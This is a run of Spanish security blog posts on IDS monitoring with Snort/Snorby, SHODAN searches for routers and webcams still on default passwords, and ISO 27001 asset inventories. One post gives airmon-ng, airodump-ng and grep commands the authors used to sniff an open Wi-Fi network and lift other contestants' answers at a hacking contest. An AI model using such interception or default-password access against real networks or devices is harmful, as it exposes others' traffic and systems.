href="http://1.bp.blogspot.com/-w3YnpXH-nes/TW46KvZSi_I/AAAAAAAAAK4/jIkhdTPt9A4/s1600/1.png"></a><br />En la primera imagen (vista del último año) se observa que al principio se detectaron mas de 70 incidencias clasificadas como graves y muchísimas leves, las medias las provoqué yo probando con el nmap. Ésto me llevó a investigar un poco más y resultó que el antivirus no escaneaba (o no lo hacía bien del todo) un tipo de ficheros específico de una aplicación y ahí se escondía el archifamoso gusano <a href="http://es.wikipedia.org/wiki/Conficker">Conficker</a> en algunos de los equipos. Podemos ver en la gráfica anterior que tras la eliminación del virus se redujeron drásticamente las alertas hasta llegar a la situación actual de la siguiente imagen (vista del último mes). <br />NOTA: Es importante revisar también las de severidad baja aunque siempre se tratan de falsos positivos.</div><div><br /></div><a href="http://2.bp.blogspot.com/-zYYj-BN6Hpw/TW46VaFsFCI/AAAAAAAAALA/WtyjIQ0vUBg/s1600/2.png"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5579461127813469218" src="http://2.bp.blogspot.com/-zYYj-BN6Hpw/TW46VaFsFCI/AAAAAAAAALA/WtyjIQ0vUBg/s400/2.png" style="cursor: hand; cursor: pointer; display: block; height: 389px; margin: 0px auto 10px; text-align: center; width: 400px;" /></a><br /><div><br />Lo que quiero destacar es que nos ayudó a detectar un problema que no sabíamos que existía como lo puede hacer con muchos otros. Otra ventaja de su uso es que ayuda a conocer un poco más sobre el funcionamiento de la red de la organización. :)<br /><br /><div style="text-align: right;">Jesús Pérez</div></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7743819158194184549-6047612861278848696?l=nicerosniunos.blogspot.com' alt='' /></div>Jesús Pérezhttp://www.blogger.com/profile/09565740223441207640noreply@blogger.com0tag:blogger.com,1999:blog-7743819158194184549.post-54362439593345147442011-02-28T13:19:00.027+01:002012-02-11T18:45:39.156+01:00El que roba a un landrón ... : h4ckc0nt3st GSICACTUALIZACIÓN: Veo en el twitter <a href="http://www.lucianobello.com.ar/post/how-to-hack-a-h4ckc0nt3st/">que no fuimos los únicos</a> :)<br /><div>El Jueves llegamos tarde a la <a href="http://www.fi.udc.es/">fic</a> comentando que seguro que ya era tarde para apuntarnos al h4ck0nt3st de las <a href="http://www.gsicoruna.com/jornadas/">GSIC</a>, pero cuando entramos en la sala estaba empezando <a href="http://www.reversemode.com/">Rubén Santamarta</a> y no todos los días tenemos el placer de poder escuchar a alguien que hace "lo que él hace", así que decidimos aplazar lo de la inscripción.<br />Cuando conseguimos empezar a jugar vimos que alguno ya llevaban 6 o 7 respuestas y tras solucionar los primeros retos que eran facilitos vimos que no iba a haber manera de coger a los que iban en cabeza por lo que nos fuimos a comer con tranquilidad.<br />Por el camino se nos ocurrió que "esnifando" todos los paquetes de la red inalámbrica (abierta) seríamos capaces de capturar las respuestas del resto de participantes, ya que la aplicación que se utilizaba en el h4ckc0nt3st no cifraba la comunicación. De esta manera iríamos guardando las respuestas y las rellenaríamos poco a poco para que no fuera demasiado descarado.<br />Tras la comida volvimos a la facultad y hubo suerte, había gente peleándose con las pruebas:<br />- Primero pusimos la tarjeta en modo monitor:<br /><i>airmon-ng start wlan0</i><br />- Capturamos todo lo de el canal y el BSSID del h4ckc0nt3st:<br /><i>airodump-ng --bssid X --channel 13 -w capture mon0</i><br />- Como teníamos prisa porque nos empezaba el taller de <a href="http://twitter.com/#!/aramosf">Alejandro Ramos</a>, el cual recomendamos a todo el mundo, en vez de utilizar el <i>Wireshark</i> probamos con el comando<i>strings</i> y un simple <i>grep </i>y vimos que esto iba a funcionar:<br /><i>strings capture-01.cap | grep clave</i><br /><i><br /></i></div><a href="http://4.bp.blogspot.com/-n0lVkIgnZ98/TWwdHndjqeI/AAAAAAAAAKQ/0gOXUA5DoAA/s1600/1.png"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5578866055094446562" src="http://4.bp.blogspot.com/-n0lVkIgnZ98/TWwdHndjqeI/AAAAAAAAAKQ/0gOXUA5DoAA/s400/1.png" style="cursor: pointer; display: block; height: 116px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 400px;" /></a><br /><div style="text-align: center;"><br /><div style="text-align: left;">Nos encontramos algunos problemas:</div></div>- Obteníamos también las respuestas erróneas y probarlas todas sería muy ruidoso, así que lo solucionamos afinando un poco el filtrado y listo:<br /><i>strings capture-01.cap | grep -i -C500 superado | grep clave=</i><br /><br /><a href="http://3.bp.blogspot.com/-xYhZKG1TGno/TWyvEy1FDjI/AAAAAAAAAKw/8qyHa5L5SSE/s1600/2.png"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5579026535303941682" src="http://3.bp.blogspot.com/-xYhZKG1TGno/TWyvEy1FDjI/AAAAAAAAAKw/8qyHa5L5SSE/s400/2.png" style="cursor: hand; cursor: pointer; display: block; height: 29px; margin: 0px auto 10px; text-align: center; width: 400px;" /></a><br />El viernes por la mañana se publicó un certificado para cifrar la aplicación y se nos acabó el juego. :(<br />Aunque no conseguimos quedar segundos que era el objetivo, siempre es divertido un poco de hacking, y más durante estos eventos. <br />Gracias a la organización por permitirnos pasar unos días así sin salir de A Coruña y ahora a esperar al <a href="http://www.rootedcon.es/">Rooted CON'2011</a>. :D<br /><div style="text-align: right;">Carlos López</div><div align="right">Jesús Pérez</div><br /><br /><br /><br /><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7743819158194184549-5436243959334514744?l=nicerosniunos.blogspot.com' alt='' /></div>Jesús Pérezhttp://www.blogger.com/profile/09565740223441207640noreply@blogger.com0tag:blogger.com,1999:blog-7743819158194184549.post-22670294185127626532011-01-15T16:31:00.024+01:002012-02-11T18:16:49.150+01:00Snort "for dummies": Insta-Snort<div><div><span class="Apple-style-span"></span><br /><div style="font-size: small;"><div><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span">Hoy voy a hablar de <a href="http://snorby.org/">Snorby</a>, n</span><span class="Apple-style-span" style="line-height: 16px;">o me centraré en los <a href="http://es.wikipedia.org/wiki/Sistema_de_detecci%C3%B3n_de_intrusos">sistemas de detección de intrusos</a> (IDS), ni en <a href="http://www.snort.org/">Snort</a> porque hay muchísima documentación al respecto. Snorby es un "fronted" para el IDS Snort, sus creadores tienen el objetivo de conseguir una herramienta altamente competitiva para la monitorización de redes tanto en entornos privados como empresariales.</span></span></span></div><div><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 16px;"><span class="Apple-style-span"><br /></span></span></span></div><div><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 16px;"><span class="Apple-style-span">Llevaba tiempo siguiendo el proyecto desde las versiones iniciales buscando algo similar </span></span><span class="Apple-style-span" style="line-height: 16px;"><span class="Apple-style-span">al <a href="http://activeworx.org/programs/idspm/index.htm">IDS Policy manager</a> (sistemas Windows) para entornos Linux. Con la llegada de la versión 2.0 parece, bajo mi punto de vista, que comienza a estar preparado para su uso en entornos de producción. Aunque de momento no dispone de muchas de las funcionalidades del IDS Policy Manager, nos ofrece otras <a href="http://snorby.org/why">ventajas</a> y es mucho más bonito :). P</span></span></span><span class="Apple-style-span" style="line-height: 16px;"><span class="Apple-style-span">odemos probar una demo en la siguiente dirección: </span></span><a href="http://demo.snorby.org/users/login">http://demo.snorby.org/users/login</a></span></div><div><span class="Apple-style-span"><br /></span></div><div><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 16px;">NOTA: </span><span class="Apple-style-span" style="line-height: 19px;"><i>demo@snorby.org/snorby</i></span></span></span></div></div><div style="font-size: small;"><span class="Apple-style-span"><br /></span></div><span class="Apple-style-span"><a href="http://4.bp.blogspot.com/_2sYHpwLKJ8Y/TTdYtm8YgFI/AAAAAAAAAJk/jsOCR__ahBQ/s1600/1.png" style="font-size: small;"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5564013405210706002" src="http://4.bp.blogspot.com/_2sYHpwLKJ8Y/TTdYtm8YgFI/AAAAAAAAAJk/jsOCR__ahBQ/s320/1.png" style="cursor: pointer; display: block; height: 118px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 320px;" /></a><div><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"></span></span></span><br /><div><div style="line-height: 16px; text-align: center;"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><br /></span></span></span></div></div></div></span></div><a href="http://1.bp.blogspot.com/_2sYHpwLKJ8Y/TTdY8GFvEkI/AAAAAAAAAJs/_z9uMz-SMb4/s1600/2.png"><span class="Apple-style-span"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5564013654089601602" src="http://1.bp.blogspot.com/_2sYHpwLKJ8Y/TTdY8GFvEkI/AAAAAAAAAJs/_z9uMz-SMb4/s320/2.png" style="cursor: pointer; display: block; height: 252px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 320px;" /></span></a><br /><div><div style="text-align: center;"><span class="Apple-style-span"><br /></span></div></div><div><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"></span></span></span><br /><div style="font-size: small; line-height: normal;"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 16px;"><span class="Apple-style-span"><span class="Apple-style-span">De las opciones que tenemos para la instalación prefiero <a href="http://www.snorby.org/Insta-Snorby-0.5.iso">Insta-Snort</a>, ya que es una distribución basada en<a href="http://www.turnkeylinux.org/">T</a></span></span></span><a href="http://www.turnkeylinux.org/"><span class="Apple-style-span"><span class="Apple-style-span">urnKey Linux</span></span></a><span class="Apple-style-span" style="line-height: 16px;"><span class="Apple-style-span"><span class="Apple-style-span"> muy sencilla de instalar y que provee de todo lo necesario para que podamos disponer un sistema Snort+<a href="http://www.securixlive.com/barnyard2/index.php">Barnyard2</a> funcionando con una interfaz gráfica muy usable y para. De esta forma podemos estudiar la información que proporcionan los sensores de una forma cómoda y ordenada.</span></span></span></span></span></span></span></div><div style="font-size: small; line-height: normal;"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 16px;"><span class="Apple-style-span"><br /></span></span></span></span></span></div><div style="font-size: small; line-height: normal;"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 16px;"><span class="Apple-style-span"><span class="Apple-style-span"></span></span></span></span><span class="Apple-style-span" style="line-height: 16px;"><span class="Apple-style-span">La instalación no supone ninguna complicación, comentar simplemente que es recomendable obtener un código Oink para actualizar las reglas de Snort (<a href="https://www.snort.org/signup">registro</a>). De forma opcional, </span></span>podemos utilizar la nueva funcionalidad que permite analizar capturas de paquetes con formato .pcap, para ello debemos registrarnos en el proyecto <a href="http://www.openfpc.org/">OpenFPC</a>. Si necesitamos que snort escuche por otra interfaz que no sea eth0 debemos seguir <a href="https://github.com/Snorby/snorby/wiki/Change-Snort-Barnyard-interface-on-Insta-Snorby-0.5">este manual</a>.</span></span></span></div><div style="font-size: small; line-height: normal;"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><br /></span></span></span></div><div style="font-size: small; line-height: normal;"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span">Para acceder a la interfaz gráfica nos conectamos al servidor web de la máquina y utilizamos los datos del usuario administrador por defecto, es más que aconsejable crear otro administrador y eliminar éste una vez logueados.</span></span></span></div><div style="font-size: small; line-height: normal;"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><br /></span></span></span></div><div style="font-size: small; line-height: normal;"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span">NOTA: <span class="Apple-style-span"><i>snorby@snorby.org</i>/</span><span class="Apple-style-span"><i>snorby</i></span></span></span></span></div><div><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"></span></span></span></span></span></span></span></span><br /><div style="line-height: normal;"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></span></span></span></span></span></span></div><div style="line-height: normal;"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><i></i></span></span><span class="Apple-style-span" style="font-size: small;">Listo, en pocos pasos ya podemos disfrutar de nuestro IDS, en la imagen se ven varias alertas porque fue tomada unos días después de realizar la instalación, para comprobar su funcionamiento vamos a realizar un escaneo de puertos con el nmap a ver si lo detecta. En esta ocasión voy a ponérselo fácil, en otras realizaré pruebas mas complejas a ver como responde.</span></span></span></span></span></span></span></span></span></div><div style="line-height: normal;"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span" style="font-size: small;"><i><br /></i></span></span></span></span></span></span></span></span></span></div><div style="line-height: normal;"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span" style="font-size: small;"></span><span class="Apple-style-span" style="font-size: small;"><i>nmap -F 192.168.0.X</i></span></span></span></span></span></span></span></span></span></div><div style="line-height: normal;"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span" style="font-size: small;"><i><br /></i></span></span></span></span></span></span></span></span></span></div></div></div></div><a href="http://2.bp.blogspot.com/_2sYHpwLKJ8Y/TTdemHCUY-I/AAAAAAAAAJ8/5XSNl5JxYN0/s1600/3.png"><span class="Apple-style-span"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5564019873456350178" src="http://2.bp.blogspot.com/_2sYHpwLKJ8Y/TTdemHCUY-I/AAAAAAAAAJ8/5XSNl5JxYN0/s320/3.png" style="cursor: hand; cursor: pointer; display: block; height: 219px; margin: 0px auto 10px; text-align: center; width: 320px;" /><span class="Apple-style-span" style="-webkit-text-decorations-in-effect: none; font-size: small;">:)</span></span></a><br /><div><div><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"></span></span></span><br /><div><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"></span></span></span></span></span></span></span></span><br /><div style="line-height: normal;"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></span></span></span></span></span></span></div><div style="line-height: normal;"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></span></span></span></span></span></span></div><div style="line-height: normal; text-align: right;"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span" style="font-size: small;">Jesús Pérez</span></span></span></span></span></span></span></span></span></div></div></div></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7743819158194184549-2267029418512762653?l=nicerosniunos.blogspot.com' alt='' /></div>Jesús Pérezhttp://www.blogger.com/profile/09565740223441207640noreply@blogger.com0tag:blogger.com,1999:blog-7743819158194184549.post-46259511046630899302010-07-20T13:13:00.009+02:002012-02-11T18:17:24.899+01:00Jugando con SHODAN<div><div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Ayer estuvimos jugando un poco con </span></span><span class="Apple-style-span" style="color: black;"><a href="http://www.shodanhq.com/" id="iqup" title="SHODAN"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">SHODAN</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">y me parece interesante dejar aquí plasmados algunos resultados bastante curiosos de las pruebas que fuimos haciendo. Para empezar, ¿qué es SHODAN? Es un buscador, para dar una explicación rápida diremos que en vez de buscar por contenidos como hace Google busca máquinas(servidores, routers, etc) que ejecuten el software que le especifiquemos, además permite filtrar los resultados por otros parámetros como países, puertos o versiones, en <a href="http://quahogcon.org/QC2010Archive/slides/schearer-shodan.pdf">este pdf</a> </span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">lo explican con más detalle. </span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Un buen punto de partida para familiarizarse con esta aplicación web son las </span></span><a href="http://www.shodanhq.com/browse" id="f31y" title="búsquedas populares"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">búsquedas populares</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">, entre las que podemos encontrar algunas con resultados muy sorprendentes. </span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><br /><div style="margin-bottom: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Después de un rato trasteando se nos ocurrió buscar routers, </span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">ya que con <a href="http://www.phenoelit-us.org/dpl/dpl.html">esta lista</a></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> de contraseñas por defecto</span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">(o otra de las muchas que hay por ahí)</span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> para cada modelo y un poco de scripting se podrían hacer maravillas. A continuación dejo algunos ejemplos de búsquedas por modelo de router:</span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><a href="http://www.shodanhq.com/?q=DWL-G700AP"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">http://www.shodanhq.com/?q=DWL-G700AP</span></span></a></div><div style="margin-bottom: 0px; margin-top: 0px;"><a href="http://www.shodanhq.com/?q=rt314"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">http://www.shodanhq.com/?q=rt314</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div><a href="http://www.shodanhq.com/?q=wg602"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">http://www.shodanhq.com/?q=wg602</span></span></a><br /><div style="margin-bottom: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">...</span></span></div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br />Como podíamos pensar en un principio lo del scripting para probar por fuerza bruta no es necesario ya que hay demasiados con la configuración por defecto:</span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div><a href="http://4.bp.blogspot.com/_2sYHpwLKJ8Y/TEWFM-VpykI/AAAAAAAAAI4/im02swmeTKc/s1600/imagen0"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5495945378214300226" src="http://4.bp.blogspot.com/_2sYHpwLKJ8Y/TEWFM-VpykI/AAAAAAAAAI4/im02swmeTKc/s320/imagen0" style="cursor: pointer; display: block; height: 215px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 320px;" /></a><br /><div style="margin-bottom: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div><div style="margin-bottom: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Hasta aquí vemos que son routers como podrían ser los de nuestra casa, la configuración por defecto puede ser por distintos motivos que pueden ir desde simples tormentas hasta que alguien lo reinició como le aconsejaron en el soporte de su ISP y no lo volvió a securizar por desconocimiento, por vagancia, por prisa... Por experiencia como clientes de más de un ISP no es extraño encontrarse que los técnicos que hacen la instalación en casas la dejen así por los mismos motivos.</span></span></div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br />Pero nos encontramos que incluso routers para cosas "más serias" supuestamente dentro de una empresa(la gente no suele tener de esos en su casa) están accesibles sin pedir ni usuario ni contraseña. Imaginemos por un momento que a alguien se le ocurriera instalar un sniffer en este router CISCO </span></span><a href="http://isc.sans.edu/diary.html?storyid=7609" id="z_em" title="como se explica en éste artículo"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">como se explica en éste artículo</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">, podría capturar todo lo que pasase por cualquiera de las interfaces del router. Viendo las pocas molestias que se toman en cambiar las contraseñas y con todo lo que permite hacer un router de este tipo(crear VPNs por ejemplo) mejor no pensar en lo que se podría hacer desde aquí.</span></span><br /><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div></div><a href="http://2.bp.blogspot.com/_2sYHpwLKJ8Y/TEWFtEG-S9I/AAAAAAAAAJA/gWzCN7otavY/s1600/imagen1"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5495945929519156178" src="http://2.bp.blogspot.com/_2sYHpwLKJ8Y/TEWFtEG-S9I/AAAAAAAAAJA/gWzCN7otavY/s320/imagen1" style="cursor: pointer; display: block; height: 267px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 320px;" /></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Por si todo esto resultase poco sorprendente pensamos que pasaría con los sistemas de video-vigilancia, ¿estarían también expuestos con contraseñas por defecto? Pues parece que más de lo mismo, probamos con sencillas búsquedas como las siguientes:</span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><br /><div style="margin-bottom: 0px; margin-top: 0px;"><a href="http://www.shodanhq.com/?q=webcam"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">http://www.shodanhq.com/?q=webcam</span></span></a></div><div style="margin-bottom: 0px; margin-top: 0px;"><a href="http://www.shodanhq.com/?q=video%2Bweb%2Bserver"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">http://www.shodanhq.com/?q=video%2Bweb%2Bserver</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><br /><div style="margin-bottom: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Y vemos que obtenemos multitud de resultados, las contraseñas por defecto de estos sistemas son un poco más difíciles de encontrar y no se si hay alguna lista parecida a la de antes pero en los manuales del producto o sitios como foros de los propios fabricantes no lleva mucho tiempo.</span></span></div><div style="margin-bottom: 0px; margin-top: 0px;"><span class="Apple-style-span" style="-webkit-text-decorations-in-effect: underline; color: #0000ee;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></div><div style="margin-bottom: 0px; margin-top: 0px;"><span class="Apple-style-span" style="-webkit-text-decorations-in-effect: underline; color: #0000ee;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><img alt="" border="0" id="BLOGGER_PHOTO_ID_5495946399255692274" src="http://2.bp.blogspot.com/_2sYHpwLKJ8Y/TEWGIaA5A_I/AAAAAAAAAJI/d1Qw5k2DZEw/s320/imagen2" style="cursor: pointer; display: block; height: 215px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 320px;" /></span></div></div><a href="http://4.bp.blogspot.com/_2sYHpwLKJ8Y/TEWGIjU-g7I/AAAAAAAAAJQ/Ca2Img0Wx4g/s1600/imagen3"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5495946401755857842" src="http://4.bp.blogspot.com/_2sYHpwLKJ8Y/TEWGIjU-g7I/AAAAAAAAAJQ/Ca2Img0Wx4g/s320/imagen3" style="cursor: hand; cursor: pointer; display: block; height: 263px; margin: 0px auto 10px; text-align: center; width: 320px;" /></a><br /><div><div><span class="Apple-style-span" style="font-family: Arial;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Georgia, serif; font-size: 130%;"><span class="Apple-style-span" style="font-size: 16px;"><span class="Apple-style-span" style="font-family: Arial; font-size: 13px;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></span></span></span></span></div><div><span class="Apple-style-span" style="font-family: Arial;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Georgia, serif; font-size: 130%;"><span class="Apple-style-span" style="font-size: 16px;"><span class="Apple-style-span" style="font-family: Arial; font-size: 13px;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Eso de que nos puedan estar grabando(tanto en el trabajo como en tu propia casa) y retransmitiendo por internet "casi" en abierto no creo que le haga mucha gracia a nadie, sin comentarios...</span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></span></span></span></span><br /><div style="margin-bottom: 0px; margin-top: 0px; text-align: right;"><span class="Apple-style-span" style="font-family: Arial;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Georgia, serif; font-size: 130%;"><span class="Apple-style-span" style="font-size: 16px;"><span class="Apple-style-span" style="font-family: Arial; font-size: 13px;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Carlos López</span></span></span></span></span></span></span></div><div style="margin-bottom: 0px; margin-top: 0px; text-align: right;"><span class="Apple-style-span" style="font-family: Arial;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Georgia, serif; font-size: 130%;"><span class="Apple-style-span" style="font-size: 16px;"><span class="Apple-style-span" style="font-family: Arial; font-size: 13px;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Jesús Pérez</span></span></span></span></span></span></span></div></div></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7743819158194184549-4625951104663089930?l=nicerosniunos.blogspot.com' alt='' /></div>Jesús Pérezhttp://www.blogger.com/profile/09565740223441207640noreply@blogger.com1tag:blogger.com,1999:blog-7743819158194184549.post-40110737137289626962010-06-01T18:40:00.013+02:002012-02-11T18:19:54.017+01:00ISO 27001: Inventario de los activos de información<div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;">Uno de los primeros pasos que debe seguir la entidad para adaptarse a la norma </span><a href="http://es.wikipedia.org/wiki/ISO/IEC_27001"><span class="Apple-style-span" style="font-size: small;">ISO 27001</span></a><span class="Apple-style-span" style="font-size: small;"> es realizar el inventario de activos que contendrá todos aquellos activos de información que tienen algún valor para la organización y que quedan dentro del alcance del </span><a href="http://es.wikipedia.org/wiki/Sistema_de_Gesti%C3%B3n_de_la_Seguridad_de_la_Informaci%C3%B3n"><span class="Apple-style-span" style="font-size: small;">SGSI</span></a><span class="Apple-style-span" style="font-size: small;">. En un principio puede parecer un poco abrumador para un principiante(como yo) por la enorme cantidad de activos que se te van ocurriendo por eso decidí empezar por clasificarlos de alguna forma, de entre las múltiples maneras que me encontré elijo la definida por los expertos del </span><a href="http://groups.google.com/group/iso27001security"><span class="Apple-style-span" style="font-size: small;">foro ISO27k</span></a><span class="Apple-style-span" style="font-size: small;"> ya que me parece la más completa, mostrando ejemplos de cada tipo y es válida para entidades de muy distinta naturaleza. Éste podría ser un buen punto para comenzar siempre teniendo en cuenta lo que nos aconsejan también en ese foro:</span></span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><i><span 